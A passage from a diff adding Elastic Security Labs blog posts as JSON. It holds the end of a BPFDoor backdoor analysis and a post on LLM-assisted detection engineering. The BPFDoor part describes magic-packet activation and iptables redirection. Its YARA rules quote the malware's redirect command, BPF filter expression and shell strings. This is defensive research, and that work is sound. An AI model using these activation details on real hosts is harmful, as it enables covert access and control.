These handshake packets also happen to be delivered to the backdoor (like every packet on the system) but are filtered out by BPF. Once the connection is established, however, the attacker sends a magic packet to the legitimate service. The implant receives it and makes a note of the originating IP and port the attacker is using, and it opens a new listening socket on an inconspicuous port (42391 - 43391).\n\nThe implant then reconfigures the firewall to temporarily redirect all traffic from the attacker’s IP/port combination to the new listening socket. The attacker initiates a second TCP handshake on the same legitimate port as before, only now iptables forwards those packets to the listening socket owned by the implant. This establishes the communication channel between attacker and implant that will be used for command and control. The implant then covers its tracks by removing the iptables firewall rules that redirected the traffic.\n\nDespite the firewall rule being removed, traffic on the legitimate port will continue to be forwarded to the implant due to how Linux statefully tracks connections. No visible traffic will be addressed to the implant port (although it will be delivered there).\n\n\n\n## BPF Filters\n\nAs stated in step 9 (above), [BPF](https://www.kernel.org/doc/html/v5.12/networking/filter.html), or Berkeley Packet Filter, is a technology from the early ’90s that allows a user-space program to attach a network filter onto any socket and allow or disallow certain types of data to come through the socket. These filters are made up of bytecode that runs on an abstract virtual machine in the Linux kernel. The BPF virtual machine has functionality to inspect all parts of incoming packets and make an allow/drop decision based on what it sees. 
You can see in the image example below what this looks like within the BPFDoor source code:\n\n\n\nWe took this BPF code, converted it, and wrote it up as pseudocode in an effort to aid our research and craft packets able to successfully get through these filters in order to activate the backdoor.\n\n\n\nThe above capabilities allow BPFDoor to attach a filter onto any socket and allow or disallow certain types of data to come through the socket - used carefully by the adversary to invoke a series of different functions within the payload.\n\n## Historical Analysis\n\nWe wanted to see over time, between BPFDoor payloads, what, if anything, the threat actors modified. A number of samples were detonated and analyzed, ranging from the uploaded source code to a [sample](https://www.virustotal.com/gui/file/599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683/detection) uploaded last month. We found that the behavior over time did not change a great deal. It maintained the same relative attack lifecycle with a few variations in the hardcoded values such as passwords, process names, and files - this is not uncommon when compared to other malware samples that look to evade detection or leverage payloads across a variety of victims.\n\nWe posit that the threat group would change passwords and update process or file names in an effort to improve operational security and remain hidden. It also makes sense that the general functionality of the backdoor would not change in any great way. As the saying goes, “If it’s not broken, don’t fix it”. 
Our malware analysis and reverse engineering team compared the source code (uploaded to [VirusTotal](https://www.virustotal.com/gui/file/8b9db0bc9152628bdacc32dab01590211bee9f27d58e0f66f6a1e26aea7552a6/detection) and found on [Pastebin](https://pastebin.com/raw/kmmJuuQP)) to a recently uploaded sample, highlighting some of the notable changes within the main function of the malware in the images below.\n\n\n\nAs we mentioned earlier, we have come across one recent [sample](https://www.virustotal.com/gui/file/07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d/detection) that does not exhibit some of the tactics of prior payloads - it doesn’t alter its initial name to a hardcoded value and simply executes from its placed location; otherwise, it models relatively the same behavior.\n\n## Linux Malware Sophistication\n\nOne trend we have had the privilege of observing at Elastic is the threat landscape of Linux-targeted attacks - these often focus on cloud workloads, or systems that typically have less observational technology configured in many of the environments we see. The trend of complex, well-designed payloads is something that is often simply overlooked, and specifically in the case of BPFDoor, remained hidden for years.\n\nIt is important to consider these workloads a critical component of your security posture: a lack of visibility within cloud workloads will eventually lead to large gaps in security controls - adversarial groups increasingly understand these trends, and act accordingly. Best practices state that endpoint defenses should be consistent across the fleet of systems under management, and conform to a least privilege architecture.\n\n## Detection of BPFDoor\n\nAfter researching this malware, it became apparent why the backdoor remained in use and hidden for so long. 
If you aren’t intimately familiar with Linux process abnormalities or weren’t looking for it, you would generally not detect it. Even though it takes advantage of Linux capabilities in a stealthy manner to evade detection, there are still opportunities for both behavioral and signature-based detections.\n\nThe first area of opportunity we witnessed while testing was the behavior we observed during the initial execution of the malware, specifically its working directory, in a shared memory location /dev/shm. This is a native temporary filesystem location in Linux that uses RAM for storage, and a binary executing from it, let alone generating network connections, is fairly uncommon in practice.\n\nDuring execution, BPFDoor removes existing files from /dev/shm and copies itself there prior to initialization. A detection for this would be any execution of a binary from this directory as root (you have to be root to write to and read from this directory).\n\nThis was verified by detonating the binary in a VM while our Elastic Agent was installed and observing the sequence of events. You can see an image of this detection on the Kibana Security Alerts page below. This rule is publicly available as an Elastic SIEM detection rule - [Binary Executed from Shared Memory Directory](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_process_started_in_shared_memory_directory.toml):\n\n\n\nThe second opportunity we noticed for detection was a specific PID file being created in /var/run. We noticed the dropped PID file was completely empty while doing a quick query via the [Osquery integration](https://docs.elastic.co/en/integrations/osquery_manager) to the /var/run directory. 
While this is not inherently malicious, it is unusual for the file size of a PID file to be 0 or above 10 bytes, and thus we created an additional rule centered around detecting this unusual behavior.\n\nOur [Abnormal Process ID or Lock File Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_abnormal_process_id_file_created.toml) rule identifies the creation of a PID file in the main directory of /var/run with no subdirectory, ignoring common PID files to be expected:\n\n\n\nThe third area we wanted to look at was the network connections tied to two of the three capabilities (reverse shell and bind shell) the backdoor possesses. We wanted to see if there were any suspicious network connections tied to process or user abnormalities we could sequence together based on the way BPFDoor handles establishing a reverse or bind shell.\n\nThe reverse shell was the first capability focused on. Taking a deep look at the process tree in and around the reverse shell establishment allowed us to key in on what would be considered a strange or even abnormal sequence of events leading to and involving an outbound network connection.\n\nWe developed a hunt rule sequence that identifies an outbound network connection attempt followed by a session id change as the root user by the same process entity. The reason we developed these network-focused rules as hunt rules is the possible performance impact of running them continually.\n\nThe bind shell was the last capability we homed in on. Identifying an abnormal sequence of events surrounding the bind shell connection was difficult due to the way it forks, then accepts the connection and kills the accepting process once the connection is established. 
Therefore, we had to focus on the sequence of events within the process entity id directly involving the network connection and subsequent killing of the accepting process.\n\nAfter developing the 2 detection rules and 2 hunt rules listed below, in addition to the 6 YARA signatures deployed, we were able to detect BPFDoor in a myriad of different ways and within different stages of its life cycle. As stated earlier, though, if you detect this malware in your environment, it should be the least of your concerns given the threat actor will most likely have already successfully compromised your network via other means.\n\n\n\n### Existing Detection Rules\n\nThe following Elastic Detection Rules will identify BPFDoor activity:\n\n- [Abnormal Process ID or Lock File Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_abnormal_process_id_file_created.toml)\n- [Binary Executed from Shared Memory Directory](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_process_started_in_shared_memory_directory.toml)\n\n### Hunting Queries\n\nThis EQL rule can be used to successfully identify BPFDoor reverse shell connections established within your environment:\n\n**EQL BPFDoor reverse shell hunt query**\n\n```\nsequence by process.entity_id with maxspan=1m\n[network where event.type == \"start\" and event.action == \"connection_attempted\" and user.id == \"0\" and not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\")]\n[process where event.action == \"session_id_change\" and user.id == \"0\"]\n```\n\n\n\nThe hunt rule we created here identifies a sequence of events beginning with a session id change, followed by a network connection accepted, in correlation with ptmx file creation and a deletion of the process responsible for accepting the network connection. 
This EQL rule can be used to successfully identify BPFDoor bind shell connections within your environment:\n\n**EQL BPFDoor bind shell hunt query**\n\n```\nsequence by process.entity_id with maxspan=1m\n[process where event.type == \"change\" and event.action == \"session_id_change\" and user.id == 0 and not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\")]\n[network where event.type == \"start\" and event.action == \"connection_accepted\" and user.id == 0]\n[file where event.action == \"creation\" and user.id == 0 and file.path == \"/dev/ptmx\"]\n[process where event.action == \"end\" and user.id == 0 and not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\")]\n```\n\n\n\n### YARA Rules\n\nIn addition to behavioral detection rules in the Elastic Endpoint, we are releasing a set of BPFDoor Yara signatures for the community.\n\n**BPFDoor YARA rule**\n\n```\nrule Linux_Trojan_BPFDoor_1 {\n\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n description = \"Detects BPFDoor malware.\"\n reference_sample = \"144526d30ae747982079d5d340d1ff116a7963aba2e3ed589e7ebc297ba0c1b3\"\n strings:\n $a1 = \"hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event\" ascii fullword\n $a2 = \"/sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d\" ascii fullword\n $a3 = \"avahi-daemon: chroot helper\" ascii fullword\n $a4 = \"/sbin/mingetty /dev/tty6\" ascii fullword\n $a5 = \"ttcompat\" ascii fullword\n condition:\n all of them\n}\n\nrule Linux_Trojan_BPFDoor_2 {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n 
description = \"Detects BPFDoor malware.\"\n reference_sample = \"3a1b174f0c19c28f71e1babde01982c56d38d3672ea14d47c35ae3062e49b155\"\n strings:\n $a1 = \"hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event\" ascii fullword\n $a2 = \"/sbin/mingetty /dev/tty7\" ascii fullword\n $a3 = \"pickup -l -t fifo -u\" ascii fullword\n $a4 = \"kdmtmpflush\" ascii fullword\n $a5 = \"avahi-daemon: chroot helper\" ascii fullword\n $a6 = \"/sbin/auditd -n\" ascii fullword\n condition:\n all of them\n}\n\nrule Linux_Trojan_BPFDoor_3 {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n description = \"Detects BPFDoor malware.\"\n reference_sample = \"591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78\"\n strings:\n $a1 = \"[-] Spawn shell failed.\" ascii fullword\n $a2 = \"[+] Packet Successfuly Sending %d Size.\" ascii fullword\n $a3 = \"[+] Monitor packet send.\" ascii fullword\n $a4 = \"[+] Using port %d\"\n $a5 = \"decrypt_ctx\" ascii fullword\n $a6 = \"getshell\" ascii fullword\n $a7 = \"getpassw\" ascii fullword\n $a8 = \"export %s=%s\" ascii fullword\n condition:\n all of them\n}\n\nrule Linux_Trojan_BPFDoor_4 {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n description = \"Detects BPFDoor malware.\"\n reference_sample = \"591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78\"\n strings:\n $a1 = { 45 D8 0F B6 10 0F B6 45 FF 48 03 45 F0 0F B6 00 8D 04 02 00 }\n condition:\n all of them\n}\n\nrule Linux_Trojan_BPFDoor_5 {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n 
category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n description = \"Detects BPFDoor malware.\"\n reference_sample = \"76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925\"\n strings:\n $a1 = \"getshell\" ascii fullword\n $a2 = \"/sbin/agetty --noclear tty1 linux\" ascii fullword\n $a3 = \"packet_loop\" ascii fullword\n $a4 = \"godpid\" ascii fullword\n $a5 = \"ttcompat\" ascii fullword\n $a6 = \"decrypt_ctx\" ascii fullword\n $a7 = \"rc4_init\" ascii fullword\n $b1 = { D0 48 89 45 F8 48 8B 45 F8 0F B6 40 0C C0 E8 04 0F B6 C0 C1 }\n condition:\n all of ($a*) or 1 of ($b*)\n}\n\nrule Linux_Trojan_BPFDoor_6 {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-05-10\"\n last_modified = \"2022-05-10\"\n os = \"Linux\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BPFDoor\"\n threat_name = \"Linux.Trojan.BPFDoor\"\n description = \"Detects BPFDoor malware.\"\n reference_sample = \"dc8346bf443b7b453f062740d8ae8d8d7ce879672810f4296158f90359dcae3a\"\n strings:\n $a1 = \"getpassw\" ascii fullword\n $a2 = \"(udp[8:2]=0x7255) or (icmp[8:2]=0x7255) or (tcp[((tcp[12]&0xf0)>>2):2]=0x5293)\" ascii fullword\n $a3 = \"/var/run/haldrund.pid\" ascii fullword\n $a4 = \"Couldn't install filter %s: %s\" ascii fullword\n $a5 = \"godpid\" ascii fullword\n condition:\n all of them\n}\n```\n\n## Interacting with BPFDoor\n\nThe Elastic Security Team has released several tools that can aid in further research regarding BPFDoor, including a network scanner used to identify infected hosts, a BPFDoor malware configuration extractor, and a BPFDoor client binary that can be used to actively interact with a sample.\n\n### BPFDoor Scanner\n\nThe Elastic Security Team [has released](https://www.elastic.co/security-labs/bpfdoor-scanner) a Python script that can identify if you have BPFDoor-infected hosts.\n\nThe scanner sends a packet to a defined IP address using the default target port (68/UDP) and default interface. 
It listens to return traffic on port 53/UDP.\n\n\n\n### BPFDoor Configuration Extractor\n\nThis tool will allow you to extract configurations from any BPFDoor malware you may have collected. This will allow you to develop additional signatures and further analyze the malware as well as your environment.\n\nThe BPFDoor configuration extractor can be downloaded [here](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor).\n\n\n\n### BPFDoor Client POC\n\nSoon after beginning our research into this malware, we realized we would also need to actively interact with BPFDoor in order to observe the full extent of the capabilities that it possesses and monitor what these capabilities would look like from a host and SIEM level.\n\nIn order to do this, we had to break down the BPF filters in the BPFDoor source code so we could craft packets for the different protocols. To do this, we used [Scapy](https://scapy.net/), a packet manipulation program, to ensure we could pass the filters for the purpose of activating the backdoor. Once we ensured we could pass the filters, Rhys Rustad-Elliott, an engineer at Elastic, built a BPFDoor client that accepts a password, IP address, and port, allowing you to connect to a BPFDoor sample and interact if you possess the sample’s hardcoded passwords.\n\nDepending on the password or lack of password provided, BPFDoor will behave exactly the same way it would in the wild. You can invoke a reverse shell, establish a bind shell, or connect to it with no supplied password to receive a ping-back confirming its installation.\n\n\n\nResearchers looking to use BPFDoor can [reach out to Elastic Security](mailto:threat-notification@elastic.co) for access to the BPFDoor client POC. 
Please note that these tools will be shared at our discretion with those in the trusted security community looking to improve the detection of this malware.\n\n## Impact\n\nThe following MITRE ATT&CK Tactics, Techniques, and Sub-techniques have been observed with the BPFDoor malware.\n\n### Tactics\n\nTactics represent the “why” of an ATT&CK technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Execution](https://attack.mitre.org/tactics/TA0002/)\n\n### Techniques (sub-techniques)\n\nTechniques (and sub-techniques) represent ‘how’ an adversary achieves a tactical goal by performing an action.\n\n- [Native API](https://attack.mitre.org/techniques/T1106/)\n- [External Remote Services](https://attack.mitre.org/techniques/T1133/)\n- [Hide Artifacts](https://attack.mitre.org/techniques/T1564/)\n- [Indicator Removal on Host](https://attack.mitre.org/techniques/T1070/)\n- [Non-Application Layer Protocol](https://attack.mitre.org/techniques/T1095/)\n- [Command and Scripting Interpreter: Unix Shell](https://attack.mitre.org/techniques/T1059/004)\n- [Abuse Elevation Control Mechanism: Setuid and Setgid](https://attack.mitre.org/techniques/T1548/001/)\n\n## Source Pseudocode\n\nTo clearly articulate the details of this malware, we’ve created [two diagrams](https://www.elastic.co/pdf/bpfdoor_pseudocode.pdf) that outline the specific pseudocode for BPFDoor based on the source code uploaded to VT and found on Pastebin. While this contains a lot of detail, it is simple to understand if researchers choose to further this research.\n\n## Summary\n\nWhile threat groups continue to increase in maturity, we expect this kind of mature, well-designed, and hidden threat will continue to be found within Linux environments. 
These kinds of findings reiterate the importance of comprehensive security controls across the entirety of a fleet, rather than simply focusing on user endpoints.\n\nBPFDoor demonstrates a perfect example of how important monitoring workloads within Linux environments can be. Payloads such as this are near-on impossible to observe and detect without sufficient controls, and should be considered a moving trend within the general adversarial landscape.\n\n## Observables\n\n| Observable | Type | Reference | Note |\n| ---------------------------------------------------------------- | ------------ | -------------------- | -------------------------------- |\n| /dev/shm/kdmtmpflush | process name | BPFDoor process name | Observed process name of BPFDoor |\n| /var/run/haldrund.pid | file name | BPFDoor file name | Observed BPFDoor PID file |\n| /var/run/kdevrund.pid | file name | BPFDoor file name | Observed BPFDoor PID file |\n| /var/run/xinetd.lock | file name | BPFDoor file name | Observed BPFDoor lock file |\n| 74ef6cc38f5a1a80148752b63c117e6846984debd2af806c65887195a8eccc56 | SHA-256 | BPFDoor malware | |\n| 07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d | SHA-256 | BPFDoor malware | |\n| 76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925 | SHA-256 | BPFDoor malware | |\n| 93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c | SHA-256 | BPFDoor malware | |\n| 96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9 | SHA-256 | BPFDoor malware | |\n| 599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683 | SHA-256 | BPFDoor malware | |\n| 2e0aa3da45a0360d051359e1a038beff8551b957698f21756cfc6ed5539e4bdb | SHA-256 | BPFDoor malware | |\n| f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72 | SHA-256 | BPFDoor malware | |\n| fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a | SHA-256 | BPFDoor malware | |\n| 5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3 | SHA-256 | 
BPFDoor malware | |\n| f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27 | SHA-256 | BPFDoor malware | |\n| 5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9 | SHA-256 | BPFDoor malware | |\n| 97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc | SHA-256 | BPFDoor malware | |\n| c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c | SHA-256 | BPFDoor malware | |\n| 4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d | SHA-256 | BPFDoor malware | |\n\n## References\n\n- https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896\n- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf\n- https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group\n\n## Artifacts\n\nArtifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt294e7cd5c4b8a050/628e88d93b9b8554904a703c/bpfdoor-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "A peek behind the BPFDoor",
+ "slug": "a-peek-behind-the-bpfdoor",
+ "date": "2022-07-13",
+ "description": "In this research piece, we explore BPFDoor — a backdoor payload specifically crafted for Linux in order to gain re-entry into a previously or actively compromised target environment.",
+ "author": [
+ {
+ "slug": "jake-king"
+ },
+ {
+ "slug": "colson-wilhoit"
+ }
+ ],
+ "image": "blog-security-detection-720x420.png",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ]
+ },
+ "id": "security_labs_content-a_peek_behind_the_bpfdoor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-accelerating_elastic_detection_tradecraft_with_llms-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-accelerating_elastic_detection_tradecraft_with_llms-md.json
new file mode 100644
index 00000000000..fa8086531ff
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-accelerating_elastic_detection_tradecraft_with_llms-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Accelerating Elastic detection tradecraft with LLMs\"\nslug: \"accelerating-elastic-detection-tradecraft-with-llms\"\ndate: \"2023-09-29\"\ndescription: \"Learn more about how Elastic Security Labs has been focused on accelerating our detection engineering workflows by tapping into more generative AI capabilities.\"\nauthor:\n - slug: mika-ayenson\n - slug: jess-daubner\nimage: \"photo-edited-09@2x.jpg\"\ncategory:\n - slug: detection-science\n - slug: machine-learning\n - slug: generative-ai\n---\n\nIn line with our [Openness Initiative](https://www.elastic.co/blog/continued-leadership-in-open-and-transparent-security), we remain committed to transparency and want to share how our internal AI R&D efforts have increased the productivity of our threat detection team. For the past few months, Elastic Security Labs has been focused on accelerating our detection engineering workflows by tapping into more generative AI capabilities. \n\n## The ONWeek Exploration Odyssey\n\nAt Elastic, outside of our long-running [Space, Time](https://www.elastic.co/about/our-source-code) tradition, we dedicate a week every 6 months to work either independently or in a team on something we call ONWeek. This is a week where we all step away from feature work, tech debt, and other similar tasks; and use the week to focus on innovative ideas, active learning opportunities, applied research, and proof of concept work. During the previous ONWeek in May, we explored ideas to leverage large language models (LLMs) with Elastic’s existing features to enhance security alert triaging and productivity for tier 1 analysts and on, internal productivity workflows, and understanding the foundational building blocks for our experimentation and tuning. Figure 1 shows several different opportunities for research we have, which involve ingesting events, passing data through tailored prompts, and generating different classes of content designed for different Elastic workflows. 
\n\n\nFigure 1: GenAI Security Use Cases\n\nFundamentally we explored several traditional ML approaches, but ultimately focused on starting simple and gradually increasing complexity, while keeping in mind these tools and concepts:\n - **Start Simple** - A mantra that guided our approach.\n - **Azure OpenAI** - Access to the GPT-4 LLM\n - **Prompt Engineering** - Developing tailored instructions for the LLM.\n - **LangChain** - Python library to help craft LLM applications.\n\nOne of our goals is to streamline Elastic’s detection engineer workflows, allowing for greater focus on better detections while showcasing the depth and nuances of our query languages. On the way there, we’re spending time experimenting to validate our prompts and prepare them for operational use. We want to make sure that as we iterate over our prompts, we don’t incidentally introduce regressions. As AI advancements emerge, we intend for our T&E to ensure that any adjustments, be it fine-tuning, model replacements, or prompt modifications, are deliberate. Ultimately, we aspire for our analysts to seamlessly utilize the latest AIML features, applying the most suitable prompts or ML techniques in the right context.\n\nWith these goals in mind, our first research use case in May focused on query generation. We learned quickly that with minimal data and prompt engineering, we could chain a series of prompts to transform raw Elastic events into EQL queries. \n\n\nFigure 2: Query Generation POC\n\nFor experimentation purposes, we simulated suspicious activity using our [Red Team Automation (RTA)](https://github.com/elastic/detection-rules/tree/main/rta) scripts and captured the endpoint activity in the SIEM through the Elastic Agent. Figure 2 displays sample events from the Elastic stack, exported to gold.json test files, that included the essential event fields for query generation. 
\n\nWe then asked GPT to analyze the event collection covering the RTA execution time window and focus on events with suspicious behavior. In our POC, the prompt asked us to pinpoint key values linked to potential anomalies. We then followed with subsequent prompts to chunk the events and summarize all of the activity. Based on all the summaries, we asked GPT to generate a list of indicators, without keying on specific values. With this short list of suspicious behaviors, we then asked GPT to generate the query. A significant advantage of our long-term open-source development is that GPT-related models are familiar with Elastic content, and so we benefited by not having to overfit our prompts.\n\nEven though going from raw data to an EQL query was conceptually straightforward, we still encountered minor hiccups like service availability with Azure OpenAI. It was relatively cheap, in what we estimated cost us around $160 in a week to use the OpenAI and Azure OpenAI inference and embedding APIs. We also explored using the GCP Vertex AI Workbench to facilitate collaborative work on Jupyter notebooks, but the complexity of using the available open source (OSS) models made them challenging to use during the short ONWeek.\n\n\nFigure 3: May 2023 ONWeek Major Outcomes\n\nWe used ONWeek to mature our roadmap like expanding beyond in-memory, library-based vector search implementations to more performant, scalable, and production-ready data stores of our detection-rules content in Elasticsearch. Based on our initial results, we understood the potential and viability of integrating GenAI into the analyst workflow (e.g. allowing event time-window selection, query generation, and timeline addition). Based on these early wins, we put on our internal roadmap plans to pursue further LLM R&D and decided to tackle one of our internal productivity workflows.\n\n## A New Horizon: Generating Investigation Guides\n\nOver the years, Elastic Security Labs has matured its content. 
Starting in 2020 by adding the Investigation Guide Security feature, then standardizing those guides in 2021. By 2023, with over 900 [rules](https://github.com/elastic/detection-rules/tree/main/rules) in place, we are actively seeking an efficient way to generate highly accurate, detailed, and standardized guides for all 900+ pre-built rules.\n\nMelding traditional ML approaches (like similarity vector search) with our prompt engineering special sauce, our team created a new prototype centered around investigation guide generation called Rulecraft. Now, with just a rule ID in hand, our rule authors can generate a baseline investigation guide solution in mere minutes! \n\n\nFigure 4: Sample Investigation Guide\n\nIn this initial exploration, we supplied detection rules, but limited input to a few fields from the rules like the description and name of GPT. We also attempted to supply the query, but it appeared to overfit the expected outcome we desired. Initially, we provided a simple prompt with these fields to evaluate how well GPT could generate a decent investigation guide with minimal effort. As we explored further, it became evident that we could benefit from chaining multiple prompts akin to what we did during the EQL query generation experiment. So we spent time creating prompts tailored to distinct sections of the investigation guide. Segmenting the prompts not only granted us greater flexibility but also addressed areas where GPT faltered, such as the \"Related Rules\" section, where GPT tended to hallucinate most. At times like this, we used traditional ML methods like similarity search and integrated our rules into a vector database for enhanced context.\n\nNext, we identified opportunities to inject additional context into specific sections. To ensure uniformity across our guides, we curated a library of approved content and language for each segment. 
This library then guided GPT in generating and formatting responses similar to our established standard messages. We then compared GenAI-produced guides with their manually crafted counterparts to identify other formatting discrepancies, general errors introduced by GPT, and even broader issues with our prompts. \n\nBased on these findings, we chose to improve our generated content by adjusting the prompts instead of using post-processing techniques like string formatting. While the automated investigation guides aren't perfect, they offer our detection engineers a solid starting place. In the past, investigation guides have enhanced our PR peer review process by providing the reviewer with more context as the rules expected behavior. We now can generate the base guide, tune it, and add more detail as needed by the detection engineer instead of starting from scratch. \n\nTo bring this capability directly to our detection engineers, we integrated Rulecraft into a GitHub action workflow, so they can generate guides on-demand. We also produced the additional 650+ guides in a mere 13 hours—a task that would traditionally span months. The automation allows us to make small tweaks and quickly regenerate base content for rules missing investigation guides. Again, these guides are still subject to our stringent internal review, but the time and effort saved by leveraging GenAI for our preliminary drafts is incredible. \n\n## Charting the Future: Next Steps \n\nOur research and development journey continues, with a central focus on refining our approach to content generation with LLMs and more thoroughly validating our results. 
Here’s a short list of our priorities now that we’ve explored the viability and efficacy of integrating LLMs into our detection engineering workflow: \n - Compare proprietary models with the latest open-source models\n - Further refine our experimentation process including event filtering, prompt optimization, and exploring various model parameters\n - Create a test suite to validate our results and prevent regressions.\n - Seamlessly integrate our R&D advancements into the [Elastic AI Assistant](https://www.elastic.co/blog/open-security-impact-elastic-ai-assistant).\n\nOverall, we want to dramatically increase our investigation guide coverage and reduce the time taken to craft these guides from the ground up. Each investigation guide provides analysts with detailed, step-by-step instructions and queries for triaging alerts. With a customer-first mentality at the forefront of our [source code](https://www.elastic.co/about/our-source-code), we aim to elevate the analyst experience with more investigation guides of even higher quality, translating into less time spent by our customers on FP analysis and alert triaging.\n\n## Summary\nKeeping in spirit with our open innovation and transparency, Elastic Security Labs has begun our generative AI voyage to enhance the productivity of our threat detection processes. Our efforts continue to evolve and incorporate prompt engineering and traditional ML approaches on a case-by-case basis, resulting in more R&D proof-of-concepts like “LetmeaskGPT” and \"Rulecraft\". The latter POC has significantly reduced the time required to craft baseline guides, improve the analyst experience, and reduce false positive analyses. There’s so much more to do and we want to include you on our journey! While we've made strides, our next steps include further refinement, developing a framework to rigorously validate our results, and exploring opportunities to operationalize our R&D, ensuring we remain at the forefront of security advancements. 
\n\nWe’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/detection-rules/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80)!\n\nAlso, feel free to check out these additional resources to learn more about how we’re bringing the latest AI capabilities to the hands of the analyst: \n - Learn how to responsibly use [ChatGPT with Elasticsearch](https://www.elastic.co/blog/chatgpt-elasticsearch-openai-meets-private-data)\n - See the new Elastic [AI Assistant](https://www.elastic.co/blog/introducing-elastic-ai-assistant) — the open, generative AI sidekick powered by ESRE and [get setup](https://www.elastic.co/guide/en/security/current/security-assistant.html#set-up-ai-assistant)\n"
+ },
+ "title": "Accelerating Elastic detection tradecraft with LLMs",
+ "slug": "accelerating-elastic-detection-tradecraft-with-llms",
+ "date": "2023-09-29",
+ "description": "Learn more about how Elastic Security Labs has been focused on accelerating our detection engineering workflows by tapping into more generative AI capabilities.",
+ "author": [
+ {
+ "slug": "mika-ayenson"
+ },
+ {
+ "slug": "jess-daubner"
+ }
+ ],
+ "image": "photo-edited-09@2x.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ },
+ {
+ "slug": "machine-learning"
+ },
+ {
+ "slug": "generative-ai"
+ }
+ ]
+ },
+ "id": "security_labs_content-accelerating_elastic_detection_tradecraft_with_llms-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-advanced_techniques_used_in_malaysian_focused_apt_campaign-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-advanced_techniques_used_in_malaysian_focused_apt_campaign-md.json
new file mode 100644
index 00000000000..50e34b3fc85
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-advanced_techniques_used_in_malaysian_focused_apt_campaign-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
